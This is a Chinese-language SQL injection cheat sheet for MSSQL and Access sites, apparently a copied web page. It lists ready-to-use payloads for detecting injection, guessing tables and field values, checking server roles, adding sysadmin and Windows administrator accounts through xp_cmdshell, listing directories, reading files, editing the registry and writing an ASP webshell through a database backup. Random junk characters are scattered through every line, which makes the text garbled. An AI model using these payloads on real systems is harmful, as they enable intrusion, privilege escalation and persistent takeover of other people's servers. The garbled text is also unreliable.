1.判断是否有注入;and 1=1 ;and 1=2 iXG>j.w{79
2.初步判断是否是mssql ;and user>0 fzkCI
{l *&l2
3.注入参数是字符'and [查询条件] and ''=' tz0Ttu=xH
n ]6
0
4.搜索时没过滤参数的'and [查询条件] and '%25'=' wEHAkc)Q
UgD'Bi
5.判断数据库系统 ['}^;Y?*o
mNnw G);$
;and (select count(*) from sysobjects)>0 mssql \AtwO
Kl46CZs#8
;and (select count(*) from msysobjects)>0 access HM$`z"p5jg
}!Diai*C
N[
Lz 0c?
v]`A_)[
6.猜数据库 ;and (select Count(*) from [数据库名])>0 \: _.N8"
Y#SmZ*zok
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 'wB Huq
K9I,Q$&xX
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 pw<q?q%
[oU+b(
9.(1)猜字段的ascii值(access) yf#%)-7(
M::IE|h
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 bE`*Uw4
XoxR5arj
(2)猜字段的ascii值(mssql) e`Zg7CaDd
f5=t*9_-[
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 4MtqQq4%
c~L6fvS
10.测试权限结构(mssql) )QSt7g|OF
(/x@W`
i9EMi_%
xv#j 593
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- <zDw&s2
NW4
s'roP
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 2YE]?!
CI,`R&=xO
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- evmEX <N
wD?=u\% &
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- |jaY[_.@
n;k97>m${x
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 9+is?Pj
[P&,}o)+E0
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ~4 ~Tcn
\'LC C-
;and 1=(select IS_MEMBER('db_owner'));-- 4 _U,-%/
I_6` Z 0
iQ]c
k-
v20I<!5w
11.添加mssql和系统的帐户 M%5$-;6~_
g7 U:A0Z
;exec master.dbo.sp_addlogin username;-- !NAX6m
;exec master.dbo.sp_password null,username,password;-- :{xN33@6\X
MMA@J
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- J2rLsNC]0
=<'iLQb1
;exec master.dbo.xp_cmdshell 'net user username password f`9rTc
-SY:qG3?
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- |nH0~P#!
rIFC#Jd/
;exec master.dbo.xp_cmdshell 'net user username password /add';-- j3[OY
@`y?\fWh
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- gJGBD9wC
nog\,NT
i{FC1tVeL_
9hs{uxwuEE
12.(1)遍历目录 Obc3^pV&
Ae_ E;[mj
;create table dirs(paths varchar(100), id int) ;gW|qb+#)j
{O&liU4
;insert dirs exec master.dbo.xp_dirtree 'c:\' LjQ1ar\
+81+4{*
;and (select top 1 paths from dirs)>0 g/X=#!
33KPo0g7
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) U)/Ul>dY
rDx],O _
f93X5hFnF
'5,,XhP
(2)遍历目录 {kRC!}
e"adkV
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Z8dN0AqZ
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ]>4Qs
(Nlm4*{h
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 'lRHdD}s
_TN$c
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 &|{,4V0%A
c+)|o!d
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 .sR&9FH
z3jzpmz
S,tVOxs^
8m[L]6F(-z
13.mssql中的存储过程 s=~7m.m
MJ"Mn^:/
xp_regenumvalues 注册表根键, 子键 "A1yqK
cf!k
9x9Z
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Cm}UWX
&CmkNm_B
xp_regread 根键,子键,键值名 GN;XB b]w
=i5:*J
;exec xp_regread >hL'#;:f#
8kc'|F\
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 'MQGR@*
;Kq?*H
xp_regwrite 根键,子键, 值名, 值类型, 值
DPxu3,Y
BG8)bhk;/
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 0o=)&%G
Z%9^6kdY
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 dVt@D&
+95dz?~
xp_regdeletevalue 根键,子键,值名 %y7wF'_Y
ft qW3VW
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 R:R@sU
2P=~3g*
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ; F(01
P"~T*Qq-R
}0nB'0|y
_r5Ild@n
14.mssql的backup创建webshell (@o
/>T
}qdJ8K
use model LXF%~^^@d
j6HbJ#]
create table cmd(str image); 2y7q
x1$C
446hr zW>@
insert into cmd(str) values (''); V1>94/waa
*Z2Q]?:{
i
backup database model to disk='c:\l.asp'; nkj'AH"2
842+KLS
2b,TkG8K
@Be:+01z
15.mssql内置函数 aw"%B-N\
/aa;M*Qp
;and (select @@version)>0 获得Windows的版本号 7%!KAtc
hPpXB:(-0
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ;k%sKVP
HPdwx
V
;and (select user_name())>0 爆当前系统的连接用户 y8S6ZtA}2
q<uLBaL_]r
;and (select db_name())>0 得到当前连接的数据库 <~X6D?
+<WT$ddK=5
KR(ftG'
d>98 E9
16.简洁的webshell BF[?* b
S|4/C
use model ~%K(ou=2
wXGFq3`
create table cmd(str image); |M>k &p,B-
4H?Ma|,
insert into cmd(str) values (''); CPeK0(7Zh
I3$vw7}5Y
backup database model to disk='g:\wwwtest\l.asp';